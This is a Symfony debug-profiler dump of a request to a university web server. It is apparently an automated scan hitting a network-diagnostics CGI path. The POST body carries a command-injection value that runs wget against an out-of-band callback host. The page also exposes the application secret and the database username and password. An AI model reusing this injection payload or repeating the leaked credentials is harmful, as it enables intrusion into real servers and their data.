ErrorController
Request
GET Parameters
No GET parameters
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
Request Headers
| Header | Value |
|---|---|
| accept-encoding | "gzip" |
| connection | "close" |
| content-length | "167" |
| host | "rad-sdsc.ucsd.edu" |
| user-agent | "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" |
| x-php-ob-level | "1" |
Request Content
Raw
command=2&ipAddr=&dnsAddr=$(wget+http://d62895116vc3b34om410wuyaza3nsf4mm.oast.fun)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sun, 15 Mar 2026 21:02:44 GMT" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2Frad-sdsc.ucsd.edu%2Fcgi%2FnetworkDiag.cgi%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fwebapps%2FFellowshipApplication%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "6040be" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "0da11a0b64b06231a4c8bc059d84af49" |
| DATABASE_URL | "postgresql://radfluro:myradpw0!@127.0.0.1:5432/fellowapp28?serverVersion=13&charset=utf8" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "167" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTPS | "on" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "rad-sdsc.ucsd.edu" |
| HTTP_USER_AGENT | "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "193.32.162.32" |
| REMOTE_PORT | "50474" |
| REQUEST_METHOD | "GET" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1773608564 |
| REQUEST_TIME_FLOAT | 1773608564.8737 |
| REQUEST_URI | "/cgi/networkDiag.cgi" |
| SCRIPT_FILENAME | "/var/www/webapps/FellowshipApplication/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "132.249.119.111" |
| SERVER_ADMIN | "eghobrial@ucsd.edu" |
| SERVER_NAME | "rad-sdsc.ucsd.edu" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33" |
| SSL_TLS_SNI | "rad-sdsc.ucsd.edu" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL" |
| UNIQUE_ID | "abcedEZQruPDnWrEGqYeXgAAAA0" |
Parent Request
Return to parent request (token = 71ebbd)
| Key | Value |
|---|---|
| _remove_csp_headers | true |
| _stopwatch_token | "e5abe0" |